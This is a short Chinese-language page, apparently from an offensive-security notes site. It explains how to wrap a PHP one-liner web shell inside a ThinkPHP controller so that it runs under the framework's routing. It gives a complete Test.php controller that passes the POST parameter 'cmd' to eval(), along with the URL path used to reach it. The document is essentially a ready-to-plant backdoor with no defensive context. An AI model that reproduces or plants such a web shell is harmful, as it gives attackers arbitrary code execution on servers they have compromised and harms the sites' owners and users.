menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 125-Thinkphp chevron_right 006-Thinkphp 专用shell.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    006-Thinkphp 专用shell.md
    609 B / 2021-07-17 00:01:30
        # Thinkphp 专用shell
    
    ### 一、漏洞简介
    
    基于thinkphp框架的一句话写法 thinkphp框架使用入口文件调用控制器,直接写一句话可能会有解析问题导致无法执行指令,研究了一下把一句话套入框架控制器的方法,分享给大家参考,
    
    ### 二、漏洞影响
    
    ### 三、复现过程
    
    在index的控制器文件夹下建立Test.php文件,代码如下:
    
    
    ```php
    <?php 
    namespace app\index\controller; 
    
    class Test 
    
    { 
    
        public function test() 
    
        { 
    
        eval($_POST["cmd"]); 
    
        } 
    
    } 
    
    ```
    
    一句话的地址就是`http://url/index/test/test`
    
    links
    file_download